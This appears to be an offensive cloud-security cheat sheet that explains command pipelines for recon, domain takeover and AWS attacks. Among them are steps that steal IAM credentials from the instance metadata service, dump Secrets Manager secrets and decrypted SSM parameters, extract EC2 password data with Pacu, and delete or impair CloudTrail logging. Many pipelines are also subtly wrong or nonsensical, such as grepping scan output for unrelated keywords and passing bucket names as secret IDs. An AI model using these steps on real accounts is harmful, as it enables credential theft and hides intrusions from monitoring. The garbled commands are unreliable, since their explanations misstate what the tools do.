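The same find-then-search idea can be sketched in Python for environments where fd and ag are not installed. This is a minimal sketch, not the tools' actual behavior; the directory layout and keyword below are invented for illustration.

```python
import os
import re

def search_breach_files(root, keyword, ext=".txt"):
    """Walk `root` and return (path, line) pairs whose lines match `keyword`
    case-insensitively -- the same idea as
    `fd -t f -e txt . root | xargs ag -i keyword`."""
    pattern = re.compile(re.escape(keyword), re.IGNORECASE)
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(ext):
                continue  # mirror fd's -e txt extension filter
            path = os.path.join(dirpath, name)
            with open(path, errors="ignore") as fh:
                for line in fh:
                    if pattern.search(line):
                        hits.append((path, line.rstrip()))
    return hits
```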
Insufficient Security Configuration
The purpose of the command seems to be to perform a takeover attempt on a domain. Domain takeover refers to the act of gaining control over a domain that is no longer actively maintained or properly configured, allowing an attacker to take control of its associated services or resources.
fd -t f -e <file_extension> . /path/to/codebase: This command uses the fd utility to search for files (-t f) with a specific extension (-e <file_extension>) under /path/to/codebase. The . is the search pattern (here it matches everything). fd prints the paths of all matching files.
xargs ag -i -C 3 "(default|weak|unrestricted|security settings)": This command passes the paths from fd to ag via xargs. The -i option enables case-insensitive matching, and -C 3 shows 3 lines of context around each match. The quoted pattern is a regular expression matching any occurrence of "default," "weak," "unrestricted," or "security settings" within the files.
Insecure Data Storage
By replacing <bucket_name> with the actual name of the S3 bucket and <object_key> with the key or path of the desired object within the bucket, the command downloads that specific object. It is typically saved to the local file system, with the name and location depending on the behavior of the cf s3download tool.
By replacing <url> with the actual target URL, the command starts a directory scan on that URL using the cf dirscan tool. The tool attempts to enumerate directories or paths within the target, mapping the directory structure of the web application or website.
gau -subs example.com: This command uses the gau tool to retrieve known URLs associated with example.com; the -subs option includes URLs from its subdomains as well.
httpx -silent: This command uses the httpx tool to make HTTP requests to the URLs obtained from the previous command. The -silent option suppresses verbose output for cleaner results.
gf unsafe: This command runs the gf tool with the unsafe pattern to flag potentially security-relevant content in the HTTP responses. gf filters and extracts data based on predefined patterns.
grep -iE "(encryption|access controls|data leakage)": This command uses grep with a case-insensitive (-i) extended regular expression (-E) to keep only lines mentioning "encryption," "access controls," or "data leakage" in the output from the previous command.
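The final grep stage is just a case-insensitive alternation. A minimal Python equivalent of that filtering step, run over invented sample response lines (the lines are not real httpx output):

```python
import re

# The same case-insensitive alternation that grep -iE applies.
KEYWORDS = re.compile(r"(encryption|access controls|data leakage)", re.IGNORECASE)

# Invented sample lines standing in for HTTP response content.
responses = [
    "X-Frame-Options: DENY",
    "TLS Encryption disabled on legacy endpoint",
    "Access Controls: none",
]

# Keep only the lines that mention one of the keywords.
flagged = [line for line in responses if KEYWORDS.search(line)]
print(flagged)
```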
ccat: This is the name of the tool being executed.
elasticsearch search: This part of the command indicates that the action being performed is a search operation in Elasticsearch.
<index>: This is a placeholder for the Elasticsearch index to search; provide the actual index name in its place.
<query>: This is a placeholder for the search query or criteria to run against the specified index; provide the actual query in its place.
Lack of Proper Logging and Monitoring
findomain -t example.com: This command uses the findomain tool to discover subdomains of the target (-t) example.com and prints the results.
httpx -silent: This command uses the httpx tool to make HTTP requests to the subdomains obtained from the previous command. The -silent option suppresses verbose output for cleaner results.
grep -E "(deployment|configuration management)": This command uses grep with an extended regular expression (-E) to keep only lines mentioning "deployment" or "configuration management" in the output from the previous command.
findomain -t example.com: This command uses the findomain tool to discover subdomains of the target (-t) example.com and prints the results.
httpx -silent: This command uses the httpx tool to make HTTP requests to the subdomains obtained from the previous command. The -silent option suppresses verbose output for cleaner results.
nuclei -t ~/nuclei-templates/ -severity high,medium -tags misconfiguration: This command runs the nuclei scanner against the probed subdomains. The -t option points to the Nuclei templates directory (~/nuclei-templates/), which holds predefined templates for identifying security issues; -severity high,medium limits detection to high- and medium-severity findings; -tags misconfiguration restricts the run to templates tagged "misconfiguration."
subfinder -d example.com: This command uses the subfinder tool to enumerate subdomains (-d) of example.com and prints the results.
httpx -silent: This command uses the httpx tool to make HTTP requests to the subdomains obtained from the previous command. The -silent option suppresses verbose output for cleaner results.
gf misconfig: This command runs the gf tool with the misconfig pattern to flag potential misconfiguration issues in the HTTP responses. gf filters and extracts data based on predefined patterns.
grep -E "(deployment|configuration management)": This command uses grep with an extended regular expression (-E) to keep only lines mentioning "deployment" or "configuration management" in the output from the previous command.
Inadequate Incident Response and Recovery
aws ec2 describe-instances: This command uses the AWS CLI (aws) to call the describe-instances API and retrieve details about the EC2 instances in the account.
jq -r '.Reservations[].Instances[] | select(.State.Name!="terminated") | select(.State.Name!="shutting-down") | select(.State.Name!="stopping") | select(.State.Name!="stopped") | select(.State.Name!="running")': This command uses jq to filter the JSON output of the previous command. The chained selects exclude instances that are terminated, shutting down, stopping, stopped, or running, which leaves only instances in transitional states such as pending or rebooting.
grep -iE "(incident response|recovery)": This command uses grep with a case-insensitive (-i) extended regular expression (-E) to keep only lines mentioning "incident response" or "recovery" in the output from the previous command.
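The jq state filter above can be mirrored in Python for clarity. The payload below is a hedged, hand-made sample shaped like describe-instances output (instance IDs invented), not real AWS data:

```python
import json

# Invented sample of `aws ec2 describe-instances` output.
payload = json.loads("""
{"Reservations": [
  {"Instances": [
    {"InstanceId": "i-aaa", "State": {"Name": "running"}},
    {"InstanceId": "i-bbb", "State": {"Name": "terminated"}},
    {"InstanceId": "i-ccc", "State": {"Name": "pending"}}
  ]}
]}
""")

# Same exclusions as the chained jq selects: everything but transitional states drops out.
EXCLUDED = {"terminated", "shutting-down", "stopping", "stopped", "running"}
odd_state = [
    inst
    for res in payload["Reservations"]
    for inst in res["Instances"]
    if inst["State"]["Name"] not in EXCLUDED
]
print([i["InstanceId"] for i in odd_state])
```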
az vm list --output json: This command uses the Azure CLI (az) to list virtual machines (VMs) via the vm list command. The --output json option sets the output format to JSON.
jq '.[] | select(.powerState != "stopped" and .powerState != "deallocated")': This command uses jq to filter the JSON output of the previous command, selecting VMs whose powerState is neither "stopped" nor "deallocated", i.e. VMs in an active or running state.
grep -iE "(incident response|recovery)": This command uses grep with a case-insensitive (-i) extended regular expression (-E) to keep only lines mentioning "incident response" or "recovery" in the output from the previous command.
gcloud compute instances list --format json: This command uses the Google Cloud SDK (gcloud) to list compute instances via the compute instances list command. The --format json option sets the output format to JSON.
jq '.[] | select(.status != "TERMINATED") | select(.status != "STOPPING") | select(.status != "SUSPENDED")': This command uses jq to filter the JSON output of the previous command, selecting instances whose status is not "TERMINATED", "STOPPING", or "SUSPENDED", i.e. instances in an active or running state.
grep -iE "(incident response|recovery)": This command uses grep with a case-insensitive (-i) extended regular expression (-E) to keep only lines mentioning "incident response" or "recovery" in the output from the previous command.
Shared Technology Vulnerabilities
nmap -p0-65535: This command starts nmap with a scan of all ports from 0 to 65535 on the target system.
--script vulners,vulscan: This option instructs nmap to run the vulners and vulscan scripts for vulnerability scanning. Both are part of the Nmap Scripting Engine (NSE) and help identify potential vulnerabilities on the target.
--script-args vulscanoutput=gnmap: This option passes additional arguments to the selected scripts. Here it sets the vulscanoutput argument to gnmap, choosing the gnmap output format for the vulscan script.
-oN -: This option writes nmap's normal-format output to standard output (stdout) instead of saving it to a file.
<target>: This is a placeholder for the target IP address or hostname; provide the actual target in its place.
grep -iE "(shared technology|underlying infrastructure|hypervisor)": This command pipes nmap's output into grep, which keeps only lines matching the case-insensitive (-i) extended regular expression (-E) for "shared technology," "underlying infrastructure," or "hypervisor."
java -jar burpsuite_pro.jar --project-file=<project_file> --unpause-spider-and-scanner --scan-checks --results-dir=<output_directory>: This command runs Burp Suite Professional by executing its JAR file (burpsuite_pro.jar) with Java. The --project-file option points to a Burp Suite project file containing configuration settings and previous scan results; --unpause-spider-and-scanner starts the spider and scanner modules for crawling and vulnerability scanning; --scan-checks enables all active scanning checks; --results-dir sets the directory where scan results are saved.
grep -iE "(shared technology|underlying infrastructure|hypervisor)" <output_directory>/*.xml: This command uses grep to search the XML result files in the output directory for lines matching the case-insensitive (-i) extended regular expression (-E) for "shared technology," "underlying infrastructure," or "hypervisor."
omp -u <username> -w <password> --xml="<get_results task_id='<task_id>'/>": This command uses the OpenVAS Management Protocol (OMP) client to retrieve scan results. The -u option sets the username, -w the password, and --xml the XML command sent to the OpenVAS server; <get_results task_id='<task_id>'/> requests the results for a specific task ID.
grep -iE "(shared technology|underlying infrastructure|hypervisor)": This command uses grep to keep only lines matching the case-insensitive (-i) extended regular expression (-E) for "shared technology," "underlying infrastructure," or "hypervisor" in the output from the previous command.
Account Hijacking and Abuse
aws iam list-users: This command uses the AWS CLI (aws) to call the iam list-users API and list all IAM users in the AWS account.
jq -r '.Users[] | select(.PasswordLastUsed == null)': This command uses jq to filter the JSON output of the previous command, selecting IAM users whose PasswordLastUsed value is null, i.e. users who have never authenticated with a password.
grep -iE "(account hijacking|credential compromise|privilege misuse)": This command uses grep with a case-insensitive (-i) extended regular expression (-E) to keep only lines mentioning "account hijacking," "credential compromise," or "privilege misuse" in the output from the previous command.
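The PasswordLastUsed filter can be sketched in Python against a hand-made sample (usernames invented; note that the real API may omit the field entirely rather than set it to null, which jq's == null also matches, so .get() is used here):

```python
import json

# Invented sample of `aws iam list-users` output.
payload = json.loads("""
{"Users": [
  {"UserName": "ci-bot", "PasswordLastUsed": null},
  {"UserName": "alice", "PasswordLastUsed": "2023-01-01T00:00:00Z"}
]}
""")

# jq: .Users[] | select(.PasswordLastUsed == null)
# .get() returns None both for an explicit null and for a missing key.
never_used = [u["UserName"] for u in payload["Users"] if u.get("PasswordLastUsed") is None]
print(never_used)
```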
az ad user list --output json: This command uses the Azure CLI (az) to list all Azure Active Directory (AD) users in the current directory via the ad user list command. The --output json option sets the output format to JSON.
jq '.[] | select(.passwordLastChanged == null)': This command uses jq to filter the JSON output of the previous command, selecting AD users whose passwordLastChanged value is null, i.e. users who have never changed their password.
grep -iE "(account hijacking|credential compromise|privilege misuse)": This command uses grep with a case-insensitive (-i) extended regular expression (-E) to keep only lines mentioning "account hijacking," "credential compromise," or "privilege misuse" in the output from the previous command.
gcloud auth list --format=json: This command uses the Google Cloud SDK (gcloud) to list all authenticated accounts in the current configuration. The --format=json option sets the output format to JSON.
jq -r '.[] | select(.status == "ACTIVE") | select(.credential_last_refreshed_time.seconds == null)': This command uses jq to filter the JSON output of the previous command, selecting accounts that are "ACTIVE" but whose credential_last_refreshed_time.seconds value is null, indicating credentials that have not been refreshed.
grep -iE "(account hijacking|credential compromise|privilege misuse)": This command uses grep with a case-insensitive (-i) extended regular expression (-E) to keep only lines mentioning "account hijacking," "credential compromise," or "privilege misuse" in the output from the previous command.
Retrieve EC2 Password Data
aws ec2 describe-instances --query 'Reservations[].Instances[].{InstanceId: InstanceId, State: State.Name, PasswordData: PasswordData}': This command uses the AWS CLI (aws) to describe the EC2 instances in the account. The --query option applies a custom projection that returns only the instance ID, state, and password data for each instance.
jq -r '.[] | select(.State == "running") | select(.PasswordData != null) | {InstanceId: .InstanceId, PasswordData: .PasswordData}': This command uses jq to filter the JSON output of the previous command, selecting instances that are in the "running" state and have non-null password data, and constructing a new JSON object containing the instance ID and password data.
grep -i "RDP": This command uses grep to keep only lines containing the case-insensitive string "RDP" in the output from the previous command, filtering for instances whose password data indicates a Remote Desktop Protocol (RDP) configuration.
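The jq-plus-grep stage of this pipeline can be mirrored in Python. The records below are invented samples shaped like the custom --query projection above, not real instance data:

```python
# Invented sample shaped like the --query projection output.
instances = [
    {"InstanceId": "i-aaa", "State": "running", "PasswordData": "RDP:enc..."},
    {"InstanceId": "i-bbb", "State": "stopped", "PasswordData": None},
    {"InstanceId": "i-ccc", "State": "running", "PasswordData": None},
]

# jq: select running + non-null PasswordData, then project two fields.
with_passwords = [
    {"InstanceId": i["InstanceId"], "PasswordData": i["PasswordData"]}
    for i in instances
    if i["State"] == "running" and i["PasswordData"] is not None
]

# grep -i "RDP": case-insensitive substring filter on the password data.
rdp_hits = [i for i in with_passwords if "rdp" in i["PasswordData"].lower()]
print([i["InstanceId"] for i in rdp_hits])
```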
python cloudmapper.py --account <account_name> collect --regions <region1,region2>: This command runs the cloudmapper.py script to collect AWS account data for <account_name> in the specified regions (<region1,region2>), gathering information about the account's resources and configurations.
python cloudmapper.py --account <account_name> enum --services ec2 --region <region1,region2>: This command runs the cloudmapper.py script to enumerate the EC2 service for the specified account and regions, focusing on information about EC2 instances.
jq -r '.EC2[] | select(.password_data != null) | {InstanceId: .instance_id, PasswordData: .password_data}': This command uses jq to filter the JSON output of the previous command, selecting EC2 instances with non-null password_data and constructing a new JSON object containing the instance ID and password data.
grep -i "RDP": This command uses grep to keep only lines containing the case-insensitive string "RDP" in the output from the previous command, filtering for instances whose password data indicates an RDP configuration.
python pacu.py: This command runs the pacu.py script, the main entry point for the PACU tool. It launches PACU, from which various AWS security testing and exploitation tasks can be performed.
--no-update: This option disables PACU's automatic update check so the current version is used as-is.
--profile <profile_name>: This option selects the AWS profile used for authentication and authorization; <profile_name> must correspond to a configured AWS profile with valid credentials.
--module ec2__get_password_data: This option selects the PACU module to run; ec2__get_password_data retrieves password data for EC2 instances.
--regions <region1,region2>: This option sets the AWS regions to target, given as a comma-separated list, in which the ec2__get_password_data module will run.
--identifier "RDP": This option sets an identifier for the module; here "RDP" directs the module to look for EC2 instances whose password data relates to Remote Desktop Protocol.
--json: This option instructs PACU to output the results in JSON format.
| grep -i "RDP": This part of the pipeline uses grep to keep only lines containing the case-insensitive string "RDP" in PACU's JSON output, filtering for instances whose password data indicates an RDP configuration.
Steal EC2 Instance Credentials
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/: This command sends an HTTP GET request to the EC2 instance metadata service endpoint, which returns the names of the IAM roles whose security credentials are available to the instance.
xargs -I {} curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/{} | jq -r '.AccessKeyId, .SecretAccessKey, .Token': This command uses xargs to substitute each role name from the previous command into a follow-up request. The inner curl fetches the credential document for that role, and jq extracts the AccessKeyId, SecretAccessKey, and Token fields; the -r option outputs the values in raw (non-quoted) form.
imds-helper http://169.254.169.254/latest/meta-data/iam/security-credentials/: This command runs the imds-helper tool with the metadata URL as its argument; the tool queries the instance metadata service for information about IAM security credentials.
grep -E "AccessKeyId|SecretAccessKey|Token": This command uses grep with an extended regular expression (-E) to filter the imds-helper output, displaying only lines containing "AccessKeyId", "SecretAccessKey", or "Token".
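The two-step metadata walk (list role names, then fetch each role's credential document) can be sketched in Python. To keep the sketch runnable, the IMDS is simulated with a dict; the role name and key values are invented, and a live version would issue the HTTP GETs shown in the comments:

```python
import json

# Simulated IMDS responses; a live request would GET
# http://169.254.169.254/latest/meta-data/iam/security-credentials/
# and then .../security-credentials/<role-name>.
fake_imds = {
    "": "my-instance-role",  # step 1: the role listing (invented name)
    "my-instance-role": json.dumps({
        "AccessKeyId": "ASIAEXAMPLE",
        "SecretAccessKey": "secret",
        "Token": "token",
    }),
}

role = fake_imds[""]                 # step 1: enumerate role names
creds = json.loads(fake_imds[role])  # step 2: fetch that role's credentials
fields = [creds["AccessKeyId"], creds["SecretAccessKey"], creds["Token"]]
print(fields)
```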
python pacu.py: This command runs the pacu.py script, the main entry point for the PACU tool. It launches PACU, from which various AWS security testing and exploitation tasks can be performed.
--no-update: This option disables PACU's automatic update check so the current version is used as-is.
--profile <profile_name>: This option selects the AWS profile used for authentication and authorization; <profile_name> must correspond to a configured AWS profile with valid credentials.
--module imds__gather_credentials: This option selects the PACU module to run; imds__gather_credentials collects IAM security credentials from the instance metadata service.
--json: This option instructs PACU to output the results in JSON format.
| grep -E "AccessKeyId|SecretAccessKey|Token": This part of the pipeline uses grep with an extended regular expression (-E) to filter PACU's JSON output, displaying only lines containing "AccessKeyId", "SecretAccessKey", or "Token".
Retrieve a High Number of Secrets Manager secrets
ccat: This command runs the ccat tool, which syntax-highlights file contents or command output in the terminal.
secretsmanager get-secret-value <secret_name>: This specifies the AWS Secrets Manager operation to retrieve the value of the secret named <secret_name>, which should be the name or ARN (Amazon Resource Name) of a secret stored in AWS Secrets Manager.
aws secretsmanager list-secrets --query 'SecretList[].Name': This AWS CLI command lists the names of the secrets stored in AWS Secrets Manager. The --query parameter selects only the Name field of each secret.
jq -r '.[]': This jq command reads the JSON output of the previous command and extracts each Name value. The -r option outputs the results in raw (non-quoted) form.
xargs -I {} aws secretsmanager get-secret-value --secret-id {}: This command uses xargs to substitute each secret name from the previous jq command into an AWS CLI call, retrieving each secret's value via aws secretsmanager get-secret-value with --secret-id set to the current name.
jq -r '.SecretString': This jq command reads the JSON output of each get-secret-value call and extracts the SecretString field. The -r option outputs the result in raw (non-quoted) form.
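The list-then-fetch loop above (list-secrets, iterate with xargs, extract SecretString) can be mirrored in Python. The Secrets Manager API is simulated here with a dict so the sketch is runnable; the secret names and values are invented:

```python
import json

# Simulated `list-secrets --query 'SecretList[].Name'` output (invented names).
fake_list = json.loads('["db-password", "api-key"]')

# Simulated get-secret-value responses, keyed by secret name (invented values).
fake_store = {
    "db-password": {"SecretString": "hunter2"},
    "api-key": {"SecretString": "abc123"},
}

# For each listed name, fetch the secret and pull out SecretString,
# like `xargs -I {} aws secretsmanager get-secret-value --secret-id {}`
# piped into `jq -r '.SecretString'`.
values = [fake_store[name]["SecretString"] for name in fake_list]
print(values)
```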
cf s3ls: This command is specific to the CloudFuzzer (CF) tool and lists the objects within an Amazon S3 bucket.
<bucket_name>: This parameter names the S3 bucket whose objects should be listed; replace <bucket_name> with the actual bucket name.
s3bucketbrute --bucket-prefixes <prefix_list> --region <region>: This command runs the s3bucketbrute tool, which brute-forces or guesses Amazon S3 bucket names. The --bucket-prefixes option supplies a list of name prefixes to try, and --region sets the AWS region to search.
jq -r '.[].Name': This jq command reads the JSON output of the previous command and extracts the Name value of each discovered S3 bucket. The -r option outputs the results in raw (non-quoted) form.
xargs -I {} aws secretsmanager get-secret-value --secret-id {}: This command uses xargs to substitute each bucket name from the previous jq command into an AWS CLI call, attempting to retrieve a secret via aws secretsmanager get-secret-value with --secret-id set to the current bucket name.
python cloudmapper.py --account <account_name> collect --regions <region1,region2>: This command runs CloudMapper's collect command to gather data about the resources and configurations of the specified AWS account (<account_name>) in the specified regions (<region1,region2>).
&&: This operator runs the next command only if the previous one completes successfully.
python cloudmapper.py --account <account_name> enum --services secretsmanager --region <region1,region2>: This command continues with CloudMapper's enum command, which enumerates the secrets stored in AWS Secrets Manager for the specified account and regions.
jq -r '.SecretsManager[] | {SecretId: .arn}': This jq command processes the JSON output of the previous command and extracts the SecretId (ARN) of each secret stored in AWS Secrets Manager. The -r option outputs the results in raw (non-quoted) form.
xargs -I {} aws secretsmanager get-secret-value --secret-id {}: This command uses xargs to substitute each secret ARN from the previous jq command into an AWS CLI call, retrieving each secret's value via aws secretsmanager get-secret-value with --secret-id set to the current ARN.
Retrieve And Decrypt SSM Parameters
aws ssm describe-parameters --query 'Parameters[].Name': This AWS CLI command retrieves the names of the parameters in the SSM Parameter Store via the describe-parameters operation. The --query parameter selects only the Name field from the response.
jq -r '.[]': This jq command reads the JSON output of the previous command and extracts each parameter name. The -r option outputs the results in raw (non-quoted) form.
xargs -I {} aws ssm get-parameter --name {} --with-decryption: This command uses xargs to substitute each parameter name from the previous jq command into an AWS CLI call, retrieving each parameter via aws ssm get-parameter with --name set to the current name. The --with-decryption option returns decrypted values for encrypted parameters.
jq -r '.Parameter.Value': This jq command reads the JSON output of each get-parameter call and extracts the parameter's value. The -r option outputs the result in raw (non-quoted) form.
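A single get-parameter response has the shape the final jq stage relies on. The response below is a hedged, hand-made sample (parameter name, value, and version invented) showing exactly what jq -r '.Parameter.Value' extracts:

```python
import json

# Invented sample of one `aws ssm get-parameter --with-decryption` response.
response = json.loads("""
{"Parameter": {"Name": "/prod/db/password",
               "Type": "SecureString",
               "Value": "s3cr3t",
               "Version": 3}}
""")

# jq -r '.Parameter.Value' prints exactly this field.
value = response["Parameter"]["Value"]
print(value)
```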
imds-helper http://169.254.169.254/latest/meta-data/iam/security-credentials/: This command queries the Instance Metadata Service (IMDS) endpoint http://169.254.169.254/latest/meta-data/iam/security-credentials/ to retrieve the security credentials associated with the IAM role assigned to the EC2 instance. The imds-helper tool handles the interaction with the IMDS.
jq -r '.[]': This jq command processes the JSON response of the previous command and extracts its values. The -r option outputs the results in raw (non-quoted) form.
xargs -I {}: This command sets up the placeholder {}, which is replaced with each value from the previous jq command.
imds-helper http://169.254.169.254/latest/meta-data/iam/security-credentials/{}: This command uses imds-helper to query the IMDS endpoint with {} replaced by a specific IAM role name, retrieving the security credentials for that role.
jq -r '.AccessKeyId': This jq command extracts the AccessKeyId field from the JSON response of the previous command. The -r option outputs the result in raw (non-quoted) form.
xargs -I {} aws sts assume-role --role-arn <role_arn> --role-session-name "bugbounty" --external-id <external_id> --region <region> --profile {}: This command uses xargs to substitute the value from the previous jq command into an aws sts assume-role call, which assumes the specified IAM role and generates temporary security credentials for it. The --role-arn, --role-session-name, --external-id, --region, and --profile options configure the role assumption.
jq -r '.Credentials.AccessKeyId, .Credentials.SecretAccessKey, .Credentials.SessionToken': This jq command extracts the AccessKeyId, SecretAccessKey, and SessionToken fields from the assume-role response. The -r option outputs the results in raw (non-quoted) form.
xargs -I {} aws ssm describe-parameters --query 'Parameters[].Name' --region <region> --profile {}: This command uses xargs to substitute the profile name from the previous jq command into an aws ssm describe-parameters call, retrieving the names of the parameters in the SSM Parameter Store. The --query, --region, and --profile options configure the command.
jq -r '.[]': This jq command extracts each parameter name from the describe-parameters response. The -r option outputs the results in raw (non-quoted) form.
xargs -I {} aws ssm get-parameter --name {} --with-decryption --region <region> --profile {}: This command uses xargs to substitute each parameter name from the previous jq command into an aws ssm get-parameter call, retrieving each parameter's value. The --name, --with-decryption, --region, and --profile options configure the command.
jq -r '.Parameter.Value': This jq command extracts the parameter values from the get-parameter responses. The -r option outputs the results in raw (non-quoted) form.
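The assume-role step in the middle of this chain returns a Credentials block from which the temporary key triple is extracted. The response below is a hedged, hand-made sample (account ID, ARN, and key values invented) mirroring that jq extraction:

```python
import json

# Invented sample of an `aws sts assume-role` response.
response = json.loads("""
{"Credentials": {"AccessKeyId": "ASIAEXAMPLE",
                 "SecretAccessKey": "secret",
                 "SessionToken": "token",
                 "Expiration": "2024-01-01T00:00:00Z"},
 "AssumedRoleUser": {"Arn": "arn:aws:sts::123456789012:assumed-role/demo/bugbounty"}}
""")

# jq -r '.Credentials.AccessKeyId, .Credentials.SecretAccessKey, .Credentials.SessionToken'
c = response["Credentials"]
triple = [c["AccessKeyId"], c["SecretAccessKey"], c["SessionToken"]]
print(triple)
```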
Delete CloudTrail Trail
aws cloudtrail delete-trail: This command is part of the AWS Command Line Interface (CLI) and deletes a CloudTrail trail.
--name <trail_name>: This option names the CloudTrail trail to delete; replace <trail_name> with the actual trail name.
--region <region>: This option specifies the AWS region where the trail lives; replace <region> with the appropriate region code (e.g., us-west-2, eu-central-1).
By running ccat cloudtrail, the command attempts to format CloudTrail log files for better readability, applying syntax highlighting, indentation, or other visual enhancements. This is particularly useful with large or complex CloudTrail logs, as it highlights key information and makes the content easier to analyze.
python: This command is used to execute Python code from the command line.
-c "<code>": This option allows you to pass a string of Python code directly on the command line.
"import boto3; boto3.client('cloudtrail', region_name='<region>').delete_trail(Name='<trail_name>')": This is the Python code being executed. It performs the following steps:
Imports the boto3 library, which is the AWS SDK for Python.
Uses boto3.client('cloudtrail', region_name='<region>') to create a client object for interacting with the AWS CloudTrail service in the target region (delete_trail itself takes no region parameter).
Calls the delete_trail() method on the CloudTrail client, passing the Name parameter.
Replace <trail_name> with the actual name of the CloudTrail trail you want to delete, and <region> with the appropriate AWS region code.
terraform init: This command initializes a Terraform working directory by downloading the necessary provider plugins and setting up the environment.
terraform import aws_cloudtrail.this <trail_arn>: This command imports an existing AWS CloudTrail resource into the Terraform state. The <trail_arn> should be replaced with the actual ARN (Amazon Resource Name) of the CloudTrail resource you want to import. By importing the resource, Terraform gains awareness of its existence and configuration.
terraform destroy -auto-approve: This command destroys the infrastructure defined in your Terraform configuration and removes any associated resources. The -auto-approve flag is used to automatically approve the destruction without requiring manual confirmation. This command will delete the CloudTrail resource that was imported in the previous step.
Disable CloudTrail Logging Through Event Selectors
aws cloudtrail put-event-selectors: This command is part of the AWS Command Line Interface (CLI) and is used to configure event selectors for an AWS CloudTrail trail.
--trail-name <trail_name>: This option specifies the name of the CloudTrail trail for which you want to configure event selectors. Replace <trail_name> with the actual name of the trail.
--event-selectors '[{"ReadWriteType": "ReadOnly"}]': This option specifies the event selectors to be configured for the CloudTrail trail. In this example, a single event selector is provided as a JSON array with a single object. The "ReadWriteType": "ReadOnly" setting indicates that the event selector should only capture read-only events. You can customize the event selector based on your specific requirements.
--region <region>: This option specifies the AWS region where the CloudTrail trail is located. Replace <region> with the appropriate AWS region code (e.g., us-west-2, eu-central-1) where the trail exists.
python: This command is used to execute Python code from the command line.
-c "<code>": This option allows you to pass a string of Python code directly on the command line.
"import boto3; boto3.client('cloudtrail', region_name='<region>').put_event_selectors(TrailName='<trail_name>', EventSelectors=[{'ReadWriteType': 'ReadOnly'}])": This is the Python code being executed. It performs the following steps:
Imports the boto3 library, which is the AWS SDK for Python.
Uses boto3.client('cloudtrail', region_name='<region>') to create a client object for interacting with the AWS CloudTrail service in the target region (put_event_selectors itself takes no region parameter).
Calls the put_event_selectors() method on the CloudTrail client, passing the TrailName and EventSelectors parameters.
Replace <trail_name> with the actual name of the CloudTrail trail you want to configure, and <region> with the appropriate AWS region code.
The EventSelectors parameter is set as a list with a single dictionary object, specifying the ReadWriteType as ReadOnly. This indicates that the event selector should only capture read-only events. You can customize the event selectors based on your specific requirements.
terraform init: This command initializes the Terraform working directory, downloading any necessary provider plugins and setting up the environment.
terraform import aws_cloudtrail.this <trail_arn>: This command imports an existing CloudTrail resource into the Terraform state. The aws_cloudtrail.this identifier refers to the Terraform resource representing the CloudTrail trail, and <trail_arn> is the ARN (Amazon Resource Name) of the CloudTrail trail you want to import. This step allows Terraform to manage the configuration of the existing resource.
terraform apply -auto-approve -var 'event_selector=[{read_write_type="ReadOnly"}]': This command applies the changes specified in the Terraform configuration to provision or update resources. The -auto-approve flag automatically approves the changes without asking for confirmation.
The -var 'event_selector=[{read_write_type="ReadOnly"}]' option sets the value of the event_selector variable to configure the event selectors for the CloudTrail trail. In this example, a single event selector is provided as a list with a single dictionary object, specifying the read_write_type as ReadOnly. This indicates that the event selector should only capture read-only events. You can customize the event selectors based on your specific requirements.
CloudTrail Logs Impairment Through S3 Lifecycle Rule
aws s3api put-bucket-lifecycle: This command is used to configure the lifecycle policy for an S3 bucket (on current CLI versions, the put-bucket-lifecycle-configuration subcommand is the preferred replacement).
--bucket <bucket_name>: Replace <bucket_name> with the actual name of the S3 bucket where you want to configure the lifecycle rule.
--lifecycle-configuration '{"Rules": [{"Status": "Enabled", "Prefix": "", "Expiration": {"Days": 7}}]}': This option specifies the configuration of the lifecycle rule, provided as a JSON string. In this example, the configuration includes a single rule with the following properties:
Status: Specifies the status of the rule. In this case, it is set to “Enabled” to activate the rule.
Prefix: Specifies the prefix to which the rule applies. An empty prefix indicates that the rule applies to all objects in the bucket.
Expiration: Specifies the expiration settings for the objects. In this case, the objects will expire after 7 days (Days: 7).
--region <region>: Replace <region> with the appropriate AWS region code where the S3 bucket is located.
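Since the --lifecycle-configuration value is just inline JSON, it can be generated and sanity-checked locally before being passed to the CLI; a minimal Python sketch:

```python
import json

# Build the same rule the CLI example passes inline: expire every object after 7 days
rule = {"Status": "Enabled", "Prefix": "", "Expiration": {"Days": 7}}
lifecycle = {"Rules": [rule]}

# Serialize to the JSON string expected by --lifecycle-configuration
payload = json.dumps(lifecycle)
print(payload)
```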
import boto3: This line imports the Boto3 library, which is the AWS SDK for Python.
s3 = boto3.client('s3'): This line creates a client object for the S3 service using the Boto3 library. This client object allows interaction with the S3 API.
s3.put_bucket_lifecycle_configuration(Bucket='<bucket_name>', LifecycleConfiguration={'Rules': [{'Status': 'Enabled', 'Prefix': '', 'Expiration': {'Days': 7}}]}): This line invokes the put_bucket_lifecycle_configuration method of the S3 client to configure the lifecycle rule for the specified bucket.
Bucket='<bucket_name>': Replace <bucket_name> with the actual name of the S3 bucket where you want to configure the lifecycle rule.
LifecycleConfiguration={'Rules': [{'Status': 'Enabled', 'Prefix': '', 'Expiration': {'Days': 7}}]}: This argument specifies the configuration of the lifecycle rule. It is provided as a dictionary with a single key, ‘Rules’, which maps to a list of rule dictionaries. In this example, there is a single rule with the following properties:
Status: Specifies the status of the rule. In this case, it is set to ‘Enabled’ to activate the rule.
Prefix: Specifies the prefix to which the rule applies. An empty prefix indicates that the rule applies to all objects in the bucket.
Expiration: Specifies the expiration settings for the objects. In this case, the objects will expire after 7 days (Days: 7).
terraform init: This command initializes the Terraform working directory by downloading the necessary provider plugins and setting up the backend.
terraform import aws_s3_bucket.lifecycle <bucket_name>: This command imports an existing S3 bucket into Terraform as a resource. Replace <bucket_name> with the actual name of the S3 bucket you want to import. This step associates the existing bucket with the Terraform configuration.
terraform apply -auto-approve -var 'lifecycle_rule=[{status="Enabled", prefix="", expiration={days=7}}]': This command applies the Terraform configuration, deploying the resources defined in the Terraform files.
-auto-approve: This flag automatically approves the proposed changes without requiring manual confirmation.
-var 'lifecycle_rule=[{status="Enabled", prefix="", expiration={days=7}}]': This flag sets a variable named lifecycle_rule in the Terraform configuration. It specifies the configuration for the lifecycle rule using a list of one rule object. The rule object has the following properties:
status: Specifies the status of the rule. In this case, it is set to “Enabled” to activate the rule.
prefix: Specifies the prefix to which the rule applies. An empty prefix indicates that the rule applies to all objects in the bucket.
expiration: Specifies the expiration settings for the objects. In this case, the objects will expire after 7 days (days=7).
Stop CloudTrail Trail
